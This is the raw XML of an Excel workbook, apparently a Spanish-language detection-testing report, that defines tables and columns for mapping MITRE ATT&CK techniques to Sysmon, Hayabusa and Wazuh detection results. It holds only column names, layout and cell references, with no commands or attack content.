    <tableColumn id="16" xr3:uid="{00000000-0010-0000-0200-000010000000}" name="Custom_Necesario" dataDxfId="232"/>
    <tableColumn id="17" xr3:uid="{00000000-0010-0000-0200-000011000000}" name="Conclusión_Técnica" dataDxfId="2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230" dataDxfId="229" totalsRowDxfId="228">
  <tableColumns count="31">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0300-000001000000}" name="ID_Prueba" dataDxfId="227"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0300-000002000000}" name="Fase" dataDxfId="226"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0300-000003000000}" name="Perfil" dataDxfId="225"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0300-000004000000}" name="Prioridad" dataDxfId="224"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0300-000005000000}" name="Artifact_Publico" dataDxfId="223"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0300-000006000000}" name="Modo" dataDxfId="222"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0300-000007000000}" name="Fuente" dataDxfId="221"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0300-000008000000}" name="TEC" dataDxfId="220"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0300-000009000000}" name="MITRE" dataDxfId="219"/>
    <tableColumn id="10" xr3:uid="{00000000-0010-0000-0300-00000A000000}" name="Táctica" dataDxfId="218"/>
    <tableColumn id="11" xr3:uid="{00000000-0010-0000-0300-00000B000000}" name="Objetivo_Prueba" dataDxfId="217"/>
    <tableColumn id="12" xr3:uid="{00000000-0010-0000-0300-00000C000000}" name="Configuración" dataDxfId="216"/>
    <tableColumn id="13" xr3:uid="{00000000-0010-0000-0300-00000D000000}" name="Pasos_Validacion" dataDxfId="215"/>
    <tableColumn id="14" xr3:uid="{00000000-0010-0000-0300-00000E000000}" name="Resultado" dataDxfId="214"/>
    <tableColumn id="15" xr3:uid="{00000000-0010-0000-0300-00000F000000}" name="Regla_Evento" dataDxfId="213"/>
    <tableColumn id="16" xr3:uid="{00000000-0010-0000-0300-000010000000}" name="Severity" dataDxfId="212"/>
    <tableColumn id="17" xr3:uid="{00000000-0010-0000-0300-000011000000}" name="MITRE_Detectado" dataDxfId="211"/>
    <tableColumn id="18" xr3:uid="{00000000-0010-0000-0300-000012000000}" name="Evidencia" dataDxfId="210"/>
    <tableColumn id="19" xr3:uid="{00000000-0010-0000-0300-000013000000}" name="FP_Risk" dataDxfId="209"/>
    <tableColumn id="20" xr3:uid="{00000000-0010-0000-0300-000014000000}" name="Custom_Necesario" dataDxfId="208"/>
    <tableColumn id="21" xr3:uid="{00000000-0010-0000-0300-000015000000}" name="Estado" dataDxfId="207"/>
    <tableColumn id="22" xr3:uid="{00000000-0010-0000-0300-000016000000}" name="Fecha" dataDxfId="206"/>
    <tableColumn id="23" xr3:uid="{00000000-0010-0000-0300-000017000000}" name="Captura_Log" dataDxfId="205"/>
    <tableColumn id="24" xr3:uid="{00000000-0010-0000-0300-000018000000}" name="Observaciones" dataDxfId="204"/>
    <tableColumn id="25" xr3:uid="{318F6CB8-0E6D-45D1-AF6C-8D0504B4190A}" name="Visibilidad" dataDxfId="203"/>
    <tableColumn id="26" xr3:uid="{7561F7F7-11A9-4512-9BA1-43CB0E708863}" name="Detección_Regla" dataDxfId="202"/>
    <tableColumn id="27" xr3:uid="{184489FD-C7B4-40AF-A9F5-E4064380C034}" name="Alerta_RT" dataDxfId="201"/>
    <tableColumn id="28" xr3:uid="{50EF65D0-AAFF-4AB3-8A55-79E1F71E3394}" name="Artifact_Alertante" dataDxfId="200"/>
    <tableColumn id="29" xr3:uid="{2E822539-E109-4AA3-8A82-2A1D580A676D}" name="Salida_Externa" dataDxfId="199"/>
    <tableColumn id="30" xr3:uid="{61AABDEF-3D2C-4516-A067-6CE9388F8678}" name="Veredicto_Alertabilidad" dataDxfId="198"/>
    <tableColumn id="31" xr3:uid="{A1FDDBB9-5DE6-475A-81B4-FB9305514AB7}" name="Resultado_Campaña" dataDxfId="19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96" dataDxfId="195" totalsRowDxfId="194">
  <tableColumns count="26">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0400-000001000000}" name="TEC" dataDxfId="193"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0400-000002000000}" name="MITRE" dataDxfId="192"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0400-000003000000}" name="Técnica" dataDxfId="191"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0400-000004000000}" name="ProcessCreation" dataDxfId="190"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0400-000005000000}" name="ServiceCreation" dataDxfId="189"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0400-000006000000}" name="SysmonLogForward" dataDxfId="188"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0400-000007000000}" name="Hayabusa.Rules CH" dataDxfId="187"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0400-000008000000}" name="Hayabusa.Rules CHM" dataDxfId="186"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0400-000009000000}" name="Hayabusa.Monitoring CH" dataDxfId="185"/>
    <tableColumn id="10" xr3:uid="{00000000-0010-0000-0400-00000A000000}" name="Hayabusa.Monitoring CHM" dataDxfId="184"/>
    <tableColumn id="11" xr3:uid="{00000000-0010-0000-0400-00000B000000}" name="Persistence/Triage" dataDxfId="183"/>
    <tableColumn id="12" xr3:uid="{00000000-0010-0000-0400-00000C000000}" name="Cobertura pública" dataDxfId="182"/>
    <tableColumn id="13" xr3:uid="{00000000-0010-0000-0400-00000D000000}" name="Custom necesario" dataDxfId="181"/>
    <tableColumn id="14" xr3:uid="{00000000-0010-0000-0400-00000E000000}" name="Evidencia principal" dataDxfId="180"/>
    <tableColumn id="15" xr3:uid="{00000000-0010-0000-0400-00000F000000}" name="Decisión" dataDxfId="179"/>
    <tableColumn id="16" xr3:uid="{8F08DB85-573A-40F4-A9FE-8AE70D37FE19}" name="Visibilidad pública" dataDxfId="178"/>
    <tableColumn id="17" xr3:uid="{5E152254-8D7B-47C1-93B9-308DBBCAA945}" name="Detección pública" dataDxfId="177"/>
    <tableColumn id="18" xr3:uid="{8DF52B22-C8F2-46DC-B0CD-CC395A5BC2DA}" name="Alerta RT pública" dataDxfId="176"/>
    <tableColumn id="19" xr3:uid="{3A864019-84B1-4B0A-8F73-CABB51557B1D}" name="Artifact alertante público" dataDxfId="175"/>
    <tableColumn id="20" xr3:uid="{79AB051C-E78B-49E9-A62E-C58150ECBF0E}" name="Necesidad custom alerta" dataDxfId="174"/>
    <tableColumn id="21" xr3:uid="{C8D58A0D-1EAC-4F6E-9747-67B590A6E0F9}" name="VR custom" dataDxfId="173" totalsRowDxfId="172"/>
    <tableColumn id="22" xr3:uid="{FB7FDAC2-3777-462B-B6D5-CBE11E71E329}" name="Públicos CH" dataDxfId="171" totalsRowDxfId="170"/>
    <tableColumn id="23" xr3:uid="{1D970937-2B7E-43D1-947F-46A695AF096E}" name="Wazuh base" dataDxfId="169" totalsRowDxfId="168"/>
    <tableColumn id="24" xr3:uid="{771F5262-5EA3-4AEC-87DB-0A35DB82BBC0}" name="Wazuh base - regla/evidencia" dataDxfId="167" totalsRowDxfId="166"/>
    <tableColumn id="25" xr3:uid="{0D943273-0206-4EE4-B232-0587F1515B5B}" name="Wazuh custom" dataDxfId="165" totalsRowDxfId="164"/>
    <tableColumn id="26" xr3:uid="{5C4F1F3D-267B-454C-B8F1-CF1F828A5ED8}" name="Wazuh custom - regla/evidencia" dataDxfId="163" totalsRowDxfId="1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9FDFE9-FBCE-49C6-BE2C-0FECAE636312}" name="ResumenEficaciaTable" displayName="ResumenEficaciaTable" ref="A3:C17" totalsRowShown="0" headerRowDxfId="161" dataDxfId="160">
  <autoFilter ref="A3:C17" xr:uid="{919FDFE9-FBCE-49C6-BE2C-0FECAE636312}"/>
  <tableColumns count="3">
    <tableColumn id="1" xr3:uid="{AC629824-3214-4FDA-83CB-0AC2009EA1CC}" name="Indicador" dataDxfId="159"/>
    <tableColumn id="2" xr3:uid="{AF9E1100-19D0-403A-9706-0A1F514CBCB9}" name="Valor" dataDxfId="158"/>
    <tableColumn id="3" xr3:uid="{D2AF3D58-7C30-43B3-A9FB-903BC2ECFEFF}" name="Interpretación / evidencia" dataDxfId="1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7E040-E351-4A60-BA1D-0434F9A574CA}" name="CatalogoCustomTable" displayName="CatalogoCustomTable" ref="A4:U8" totalsRowShown="0" headerRowDxfId="156" dataDxfId="155">
  <autoFilter ref="A4:U8" xr:uid="{7387E040-E351-4A60-BA1D-0434F9A574CA}"/>
  <tableColumns count="21">
    <tableColumn id="1" xr3:uid="{29042B5B-4650-44BD-AAFA-FB2F2B2232E3}" name="Artifact" dataDxfId="154"/>
    <tableColumn id="2" xr3:uid="{5D6A7C54-4B1D-48F2-9A6E-2DAAF4EAD582}" name="Categoría" dataDxfId="153"/>
    <tableColumn id="3" xr3:uid="{03299A6B-4729-420D-868C-4F89EDF65892}" name="Tipo" dataDxfId="152"/>
    <tableColumn id="4" xr3:uid="{741887CD-F7E9-455C-9A5A-452C0A525330}" name="Modo" dataDxfId="151"/>
    <tableColumn id="5" xr3:uid="{66E259B8-F9E8-4043-8B63-6F785FFEBE2C}" name="Perfil" dataDxfId="150"/>
    <tableColumn id="6" xr3:uid="{767394A6-650E-45CD-910D-83A0D3D24AA0}" name="Sources internas" dataDxfId="149"/>
    <tableColumn id="7" xr3:uid="{EB8AD169-A2F1-4C16-AA6B-9C5AEAD4FE05}" name="Técnicas TEC" dataDxfId="148"/>
    <tableColumn id="8" xr3:uid="{58E3466D-4BD7-4CA5-80C4-3B09236E7D6B}" name="MITRE ATT&amp;CK" dataDxfId="147"/>
    <tableColumn id="9" xr3:uid="{3BDF6358-78E3-4185-B38A-7386F7E6B630}" name="Fuente de telemetría" dataDxfId="146"/>
    <tableColumn id="10" xr3:uid="{0B1949B1-1567-4401-A645-3E8F95F58DD9}" name="Event IDs" dataDxfId="145"/>
    <tableColumn id="11" xr3:uid="{C5B81CCF-917A-49C7-90A6-9BACC75832D9}" name="Función metodológica" dataDxfId="144"/>
    <tableColumn id="12" xr3:uid="{2BBA71D2-76F6-44EC-8DDD-4A6B1F9DBD26}" name="Uso en campaña final" dataDxfId="143"/>
    <tableColumn id="13" xr3:uid="{27A9856D-C406-45A2-A8DD-7E52296BBFD9}" name="Técnicas detectadas" dataDxfId="142"/>
    <tableColumn id="14" xr3:uid="{B2242EDB-BFC8-418B-AF01-4B83A653198C}" name="Alertas CLIENT_EVENT" dataDxfId="141"/>
    <tableColumn id="15" xr3:uid="{DF52B4BD-56A0-42E3-A1BD-CCB8C3289A09}" name="FP hits" dataDxfId="140"/>
    <tableColumn id="16" xr3:uid="{295602F9-4DBD-4676-94B5-5D0F1BDA7B58}" name="Evidencia principal" dataDxfId="139"/>
    <tableColumn id="17" xr3:uid="{A4674D03-98B7-45A0-BA59-65A1BC414E95}" name="Fichero validado" dataDxfId="138"/>
    <tableColumn id="18" xr3:uid="{197D6CD9-10D2-455B-8145-CE366616E880}" name="SHA-256" dataDxfId="137"/>
    <tableColumn id="19" xr3:uid="{5FE678E0-4EAF-4F41-9536-4AAD63FADB26}" name="Estado" dataDxfId="136"/>
    <tableColumn id="20" xr3:uid="{429BC89A-91CF-4DD0-8447-068974CAE275}" name="Decisión" dataDxfId="135"/>
    <tableColumn id="21" xr3:uid="{4A126A0C-ABA4-446B-BEA2-CECD728CD0EC}" name="Limitaciones" dataDxfId="1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7398FE-7576-405B-9295-C20FB583C072}" name="CatalogoPublicoAuxTable" displayName="CatalogoPublicoAuxTable" ref="A11:U21" totalsRowShown="0" headerRowDxfId="133" dataDxfId="132">
  <autoFilter ref="A11:U21" xr:uid="{AC7398FE-7576-405B-9295-C20FB583C072}"/>
  <tableColumns count="21">
    <tableColumn id="1" xr3:uid="{787D4F21-D728-4C28-AA9B-B84177BF9F6C}" name="Artifact" dataDxfId="131"/>
    <tableColumn id="2" xr3:uid="{0D5B233E-F48A-4619-B28A-B9C7752A9E03}" name="Categoría" dataDxfId="130"/>
    <tableColumn id="3" xr3:uid="{36F14160-919D-4473-B2B5-48FCCFB133C4}" name="Tipo" dataDxfId="129"/>
    <tableColumn id="4" xr3:uid="{A2FBFBAF-D945-41AC-9C5F-DE4A8AC271E6}" name="Modo" dataDxfId="128"/>
    <tableColumn id="5" xr3:uid="{6360084E-CEDA-46FA-A141-0F95CD3597CB}" name="Perfil" dataDxfId="127"/>
    <tableColumn id="6" xr3:uid="{FB92733E-43A0-41E6-ABB0-792B66E4E90C}" name="Sources internas" dataDxfId="126"/>
    <tableColumn id="7" xr3:uid="{A6D84953-62AE-440A-B29B-44C8968EC369}" name="Técnicas TEC" dataDxfId="125"/>
    <tableColumn id="8" xr3:uid="{17558BFF-742E-40AC-AC60-839CC12677A5}" name="MITRE ATT&amp;CK" dataDxfId="124"/>
    <tableColumn id="9" xr3:uid="{33F93F64-9752-4E7B-90D3-DC308C818740}" name="Fuente de telemetría" dataDxfId="123"/>
    <tableColumn id="10" xr3:uid="{1006EBFD-435F-47A9-B205-1EB4AC2B8109}" name="Event IDs" dataDxfId="122"/>
    <tableColumn id="11" xr3:uid="{0AAFB4ED-46C9-43E4-A8BF-2A9E97FC3420}" name="Función metodológica" dataDxfId="121"/>
    <tableColumn id="12" xr3:uid="{BB81DEEB-2D49-48BF-811B-9EBED8561D9A}" name="Uso en campaña final" dataDxfId="120"/>
    <tableColumn id="13" xr3:uid="{588AA68C-59DA-436C-A53D-5954DBC1E9A0}" name="Técnicas detectadas" dataDxfId="119"/>
    <tableColumn id="14" xr3:uid="{DC8B4563-26AB-4AF4-874A-778787E8956E}" name="Alertas CLIENT_EVENT" dataDxfId="118"/>
    <tableColumn id="15" xr3:uid="{037E53A0-8AA0-4F11-AC8B-A75EA38D7C89}" name="FP hits" dataDxfId="117"/>
    <tableColumn id="16" xr3:uid="{9AFB47DC-90BC-4162-943C-9B55AD7DCE41}" name="Evidencia principal" dataDxfId="116"/>
    <tableColumn id="17" xr3:uid="{ED3C0747-1B79-4A5E-9704-6E94C4594C06}" name="Fichero validado" dataDxfId="115"/>
    <tableColumn id="18" xr3:uid="{FB9EFF3F-F63E-465E-9C6A-57A595E3D079}" name="SHA-256" dataDxfId="114"/>
    <tableColumn id="19" xr3:uid="{957EDC94-612D-4266-AE28-0A0E11D85ADB}" name="Estado" dataDxfId="113"/>
    <tableColumn id="20" xr3:uid="{A7769D15-2D10-4FC8-A225-C0225F246A68}" name="Decisión" dataDxfId="112"/>
    <tableColumn id="21" xr3:uid="{4A5DFF89-1CA9-4FF9-93FD-8A713F5CB409}" name="Limitaciones" dataDxfId="11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B05C3-F8B4-430E-ADD9-93CBC6154C21}" name="ResultadosCustomPerfilTable" displayName="ResultadosCustomPerfilTable" ref="A4:K9" totalsRowShown="0" headerRowDxfId="110" dataDxfId="109">
  <autoFilter ref="A4:K9" xr:uid="{7F1B05C3-F8B4-430E-ADD9-93CBC6154C21}"/>
  <tableColumns count="11">
    <tableColumn id="1" xr3:uid="{9842AABC-5303-4844-8520-06F5DC4E5B93}" name="Perfil" dataDxfId="108"/>
    <tableColumn id="2" xr3:uid="{28EB3512-363E-444F-BB17-EDCB88C176B5}" name="Artifact principal" dataDxfId="107"/>
    <tableColumn id="3" xr3:uid="{B803F479-4134-4248-8B7C-41C6B601593C}" name="Sources internas ejecutadas" dataDxfId="106"/>
    <tableColumn id="4" xr3:uid="{DEF80DDE-865D-4578-8DEB-E1B001811D48}" name="Técnicas cubiertas declaradas" dataDxfId="105"/>
    <tableColumn id="5" xr3:uid="{5CBA801B-B90D-4B81-8FD7-CAF2BC8BDACE}" name="Técnicas detectadas" dataDxfId="104"/>
    <tableColumn id="6" xr3:uid="{43DB985F-DD0B-4331-B421-BEFB84B9DDC9}" name="Filas CLIENT_EVENT" dataDxfId="103"/>
    <tableColumn id="7" xr3:uid="{35234657-50F3-4906-B8F0-C486EC7F17A2}" name="Porcentaje sobre total" dataDxfId="102"/>
    <tableColumn id="8" xr3:uid="{91CA453E-1BDD-4C71-9F80-1CF0C980A755}" name="FP hits" dataDxfId="101"/>
    <tableColumn id="9" xr3:uid="{9616753B-3023-49AD-A59A-9D6DB907E1CC}" name="Función principal" dataDxfId="100"/>
    <tableColumn id="10" xr3:uid="{B9473D5A-BE71-4F59-8784-61F70BA65311}" name="Evidencia" dataDxfId="99"/>
    <tableColumn id="11" xr3:uid="{8A620243-4910-4E93-AE25-CA32440C1845}" name="Limitaciones" dataDxfId="9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E8488B-4096-4719-BE22-386E9E62C6E7}" name="ResultadosCustomTecPerfilTable" displayName="ResultadosCustomTecPerfilTable" ref="A12:J21" totalsRowShown="0" headerRowDxfId="97" dataDxfId="96">
  <autoFilter ref="A12:J21" xr:uid="{46E8488B-4096-4719-BE22-386E9E62C6E7}"/>
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{B37B1000-6B40-4A63-9814-663611F4286F}" name="TEC" dataDxfId="95"/>
    <tableColumn id="2" xr3:uid="{F04ABD92-46BD-4A34-8916-CFAF9859C355}" name="P1" dataDxfId="94"/>
    <tableColumn id="3" xr3:uid="{41BD3585-FEF2-4EA1-9215-9753A6A61180}" name="P2" dataDxfId="93"/>
    <tableColumn id="4" xr3:uid="{009BFD8D-E24A-4E1B-A278-2CF3E34F6D40}" name="P3" dataDxfId="92"/>
    <tableColumn id="5" xr3:uid="{A0E99C65-2584-44EE-9806-350B42EA1ED0}" name="P4" dataDxfId="91"/>
    <tableColumn id="6" xr3:uid="{E8D257D1-67BF-42B5-A439-25B87A819573}" name="Filas CLIENT_EVENT" dataDxfId="90"/>
    <tableColumn id="7" xr3:uid="{8ADBCACA-83BC-4F0F-8CAB-1339B28C084F}" name="Perfil de mayor prioridad observado" dataDxfId="89"/>
    <tableColumn id="8" xr3:uid="{7A5DB983-FF44-4482-AD9B-C4B7CD8D555E}" name="Sources principales" dataDxfId="88"/>
    <tableColumn id="9" xr3:uid="{5F72BBE0-FBDA-4EE4-9BCF-AB7EB4043AAA}" name="Señal principal" dataDxfId="87"/>
    <tableColumn id="10" xr3:uid="{A52B84F6-07FE-4E3B-998E-C852CC4F646E}" name="Estado de detección" dataDxfId="86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273BE-6DAB-43E4-844E-BE277F6F8AD2}" name="ResultadosCustomSourceTable" displayName="ResultadosCustomSourceTable" ref="A24:L59" totalsRowShown="0" headerRowDxfId="85" dataDxfId="84">
  <autoFilter ref="A24:L59" xr:uid="{D1A273BE-6DAB-43E4-844E-BE277F6F8AD2}"/>
  <tableColumns count="12">
    <tableColumn id="1" xr3:uid="{BB30910A-49B8-48C8-A7BD-F6B36F3E7756}" name="Artifact principal" dataDxfId="83"/>
    <tableColumn id="2" xr3:uid="{9448A4D0-0AE3-4108-A6BB-C3C5C557134F}" name="Source interna" dataDxfId="82"/>
    <tableColumn id="3" xr3:uid="{6CCD88DC-B5BD-46A7-AFDC-651836EA3A43}" name="Perfil" dataDxfId="81"/>
    <tableColumn id="4" xr3:uid="{E1A61BA9-1757-4F17-8268-392FD529989B}" name="TEC" dataDxfId="80"/>
    <tableColumn id="5" xr3:uid="{174F6ACB-0A5B-46C4-99CA-9DC56E1B1721}" name="MITRE" dataDxfId="79"/>
    <tableColumn id="6" xr3:uid="{67D97B49-9A40-4450-AF28-AE9C948C7E02}" name="EventID" dataDxfId="78"/>
    <tableColumn id="7" xr3:uid="{6083796B-DED4-470C-8408-1679F2C8BC33}" name="SignalType" dataDxfId="77"/>
    <tableColumn id="8" xr3:uid="{95D563A1-AAA3-4F11-AB1D-0F7AA641D9E8}" name="Alertas" dataDxfId="76"/>
    <tableColumn id="9" xr3:uid="{91659DE7-299F-475C-A676-B8348C8F707A}" name="Campaña" dataDxfId="75"/>
    <tableColumn id="10" xr3:uid="{E7888C5A-2A9A-4F4B-9FCC-F608A05CD4DE}" name="Ventana UTC" dataDxfId="74"/>
    <tableColumn id="11" xr3:uid="{C3DF7DD1-BBA5-4AB7-8198-B468CD519663}" name="Source file" dataDxfId="73"/>
    <tableColumn id="12" xr3:uid="{B304C497-6C64-4E87-A136-812A4C3B0ADC}" name="Validación" dataDxfId="72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287CB6-267D-4CDF-AB5A-DE04B34291D2}" name="ResultadosCustomPruebasTable" displayName="ResultadosCustomPruebasTable" ref="A62:I64" totalsRowShown="0" headerRowDxfId="71" dataDxfId="70">
  <autoFilter ref="A62:I64" xr:uid="{12287CB6-267D-4CDF-AB5A-DE04B34291D2}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{3245A178-B6A5-40D7-81AB-85325302A8CE}" name="Campaña" dataDxfId="69"/>
    <tableColumn id="2" xr3:uid="{8C05CE2C-53FA-4B0B-86CA-3E9A23AB1119}" name="Planificadas" dataDxfId="68"/>
    <tableColumn id="3" xr3:uid="{63D7C4BC-61DE-4496-873B-4B7FC7047E66}" name="Ejecutadas" dataDxfId="67"/>
    <tableColumn id="4" xr3:uid="{D86DD8A9-7429-439D-BD72-544C162804F1}" name="OK" dataDxfId="66"/>
    <tableColumn id="5" xr3:uid="{8F4409AF-4D87-400E-82D1-6790CDF2782F}" name="WARN" dataDxfId="65"/>
    <tableColumn id="6" xr3:uid="{19099BDE-342A-4F7F-AE9B-07C6400DE6FB}" name="FAIL" dataDxfId="64"/>
    <tableColumn id="7" xr3:uid="{F155AA74-CCEB-4C03-8387-BBE7346FC193}" name="Hits" dataDxfId="63"/>
    <tableColumn id="8" xr3:uid="{B599A5FA-3640-4A2E-A1B9-CF1E5DDDBFF7}" name="Evidencia" dataDxfId="62"/>
    <tableColumn id="9" xr3:uid="{1AC75802-4A56-488F-811D-BDD8A75E180F}" name="Lectura" dataDxfId="61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 headerRowDxfId="60" dataDxfId="59" totalsRowDxfId="58">
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0900-000001000000}" name="Gap_ID" dataDxfId="57"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0900-000002000000}" name="Técnica/área" dataDxfId="56"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0900-000003000000}" name="Gap de artifact público" dataDxfId="55"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0900-000004000000}" name="Riesgo" dataDxfId="54"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0900-000005000000}" name="Perfil custom propuesto" dataDxfId="53"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0900-000006000000}" name="Fuente custom" dataDxfId="52"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0900-000007000000}" name="Discord" dataDxfId="51"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0900-000008000000}" name="Justificación" dataDxfId="50"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0900-000009000000}" name="Prioridad" dataDxfId="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C04125-A49D-4304-BBF6-8FDF185EA4BE}" name="FuentesTrazabilidadTable" displayName="FuentesTrazabilidadTable" ref="A3:J241" totalsRowShown="0" headerRowDxfId="48" dataDxfId="47">
  <autoFilter ref="A3:J241" xr:uid="{FAC04125-A49D-4304-BBF6-8FDF185EA4BE}"/>
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{9583AC3F-B22E-4023-B407-C3B333500A54}" name="ID" dataDxfId="46"/>
    <tableColumn id="2" xr3:uid="{FA26E371-C0D5-4AC2-94FB-16B04F843B2D}" name="Tipo" dataDxfId="45"/>
    <tableColumn id="3" xr3:uid="{A687BD64-82B3-457E-B6BC-DB214A026FAA}" name="Fichero" dataDxfId="44"/>
    <tableColumn id="4" xr3:uid="{14A1F6CA-976D-4459-8B02-44BAD5604666}" name="Ruta relativa" dataDxfId="43"/>
    <tableColumn id="5" xr3:uid="{BFC465B8-4062-4D6D-9040-8D9E61B72B38}" name="Fecha" dataDxfId="42"/>
    <tableColumn id="6" xr3:uid="{2ED6961F-2481-40DB-A0F1-0F37DA3B2E2E}" name="Tamaño" dataDxfId="41"/>
    <tableColumn id="7" xr3:uid="{3F0F7816-F4AF-4066-88EA-A3562961CC40}" name="SHA-256" dataDxfId="40"/>
    <tableColumn id="8" xr3:uid="{D69DC5A1-C113-435F-BD64-DCF4E2BDDF04}" name="Uso" dataDxfId="39"/>
    <tableColumn id="9" xr3:uid="{DC03EE6E-1F8B-467D-A28D-87D1E6924987}" name="Hoja o métrica derivada" dataDxfId="38"/>
    <tableColumn id="10" xr3:uid="{A4E4A529-C871-4AC4-B67E-904AA469B162}" name="Estado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zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
      <pane ySplit="3" topLeftCell="A4" activePane="bottomLeft" state="frozenSplit"/>
      <selection pane="bottomLeft" activeCell="B21" sqref="B21"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="9" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="28.625" style="42" customWidth="1"/>
    <col min="2" max="2" width="62.625" style="42" customWidth="1"/>
    <col min="3" max="3" width="50.625" style="42" customWidth="1"/>
    <col min="4" max="16384" width="9" style="42"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:26" ht="24">
      <c r="A1" s="79" t="s">
        <v>2364</v>
      </c>
      <c r="B1" s="79"/>
      <c r="C1" s="7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80" t="s">
        <v>2365</v>
      </c>
      <c r="B2" s="80"/>
      <c r="C2" s="8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41" t="s">
        <v>0</v>
      </c>
      <c r="B4" s="41" t="s">
        <v>1</v>
      </c>
      <c r="C4" s="41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39" t="s">
        <v>3</v>
      </c>
      <c r="B5" s="39" t="s">
        <v>1486</v>
      </c>
      <c r="C5" s="39" t="s">
        <v>1487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39" t="s">
        <v>4</v>
      </c>
      <c r="B6" s="39" t="s">
        <v>5</v>
      </c>
      <c r="C6" s="39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39" t="s">
        <v>7</v>
      </c>
      <c r="B7" s="39" t="s">
        <v>8</v>
      </c>
      <c r="C7" s="39" t="s">
        <v>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>
      <c r="A8" s="39" t="s">
        <v>10</v>
      </c>
      <c r="B8" s="39" t="s">
        <v>11</v>
      </c>
      <c r="C8" s="39" t="s">
        <v>1505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39" t="s">
        <v>12</v>
      </c>
      <c r="B9" s="39" t="s">
        <v>13</v>
      </c>
      <c r="C9" s="39" t="s">
        <v>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39" t="s">
        <v>15</v>
      </c>
      <c r="B10" s="39" t="s">
        <v>16</v>
      </c>
      <c r="C10" s="39" t="s">
        <v>17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39" t="s">
        <v>18</v>
      </c>
      <c r="B11" s="39" t="s">
        <v>2366</v>
      </c>
      <c r="C11" s="39" t="s">
        <v>2367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39" t="s">
        <v>19</v>
      </c>
      <c r="B12" s="39" t="s">
        <v>2368</v>
      </c>
      <c r="C12" s="39" t="s">
        <v>2369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7">
      <c r="A13" s="78" t="s">
        <v>2370</v>
      </c>
      <c r="B13" s="39" t="s">
        <v>2371</v>
      </c>
      <c r="C13" s="39" t="s">
        <v>2372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39" t="s">
        <v>20</v>
      </c>
      <c r="B14" s="39" t="s">
        <v>21</v>
      </c>
      <c r="C14" s="39" t="s">
        <v>22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</sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:C1"/>
    <mergeCell ref="A2:C2"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="A13" location="'09_Resultados_Custom'!A1" display="09_Resultados_Custom" xr:uid="{9290C423-91F8-4435-9EE1-FDA65A2B0A1B}"/>
  </hyperlinks>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.25" right="0.25" top="0.4" bottom="0.4" header="0.3" footer="0.3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0"/>
  <sheetViews>
    <sheetView zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozenSplit"/>
      <selection pane="bottomLeft" activeCell="G5" sqref="G5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="9" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="29.625" style="42" customWidth="1"/>
    <col min="2" max="2" width="22.625" style="42" customWidth="1"/>
    <col min="3" max="3" width="60.625" style="42" customWidth="1"/>
    <col min="4" max="4" width="9" style="42"/>
    <col min="5" max="8" width="18.625" style="42" customWidth="1"/>
    <col min="9" max="9" width="9" style="42"/>
    <col min="10" max="14" width="14.625" style="42" customWidth="1"/>
    <col min="15" max="18" width="9" style="42"/>
    <col min="19" max="23" width="0" style="42" hidden="1" customWidth="1"/>
    <col min="24" max="16384" width="9" style="42"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" ht="24">
      <c r="A1" s="79" t="s">
        <v>2714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40"/>
      <c r="P1" s="40"/>
      <c r="Q1" s="40"/>
      <c r="R1" s="40"/>
      <c r="S1" s="40"/>
      <c r="T1" s="40"/>
      <c r="U1" s="40"/>
      <c r="V1" s="40"/>
      <c r="W1" s="40"/>
    </row>
    <row r="2" spans="1:23" ht="21">
      <c r="A2" s="81" t="s">
        <v>2715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40"/>
      <c r="P2" s="40"/>
      <c r="Q2" s="40"/>
      <c r="R2" s="40"/>
      <c r="S2" s="50" t="s">
        <v>2136</v>
      </c>
      <c r="T2" s="50" t="s">
        <v>2425</v>
      </c>
      <c r="U2" s="40"/>
      <c r="V2" s="40"/>
      <c r="W2" s="40"/>
    </row>
    <row r="3" spans="1:23">
      <c r="A3" s="51" t="s">
        <v>23</v>
      </c>
      <c r="B3" s="51" t="s">
        <v>24</v>
      </c>
      <c r="C3" s="51" t="s">
        <v>2716</v>
      </c>
      <c r="D3" s="39"/>
      <c r="E3" s="82" t="s">
        <v>3403</v>
      </c>
      <c r="F3" s="82"/>
      <c r="G3" s="82"/>
      <c r="H3" s="82"/>
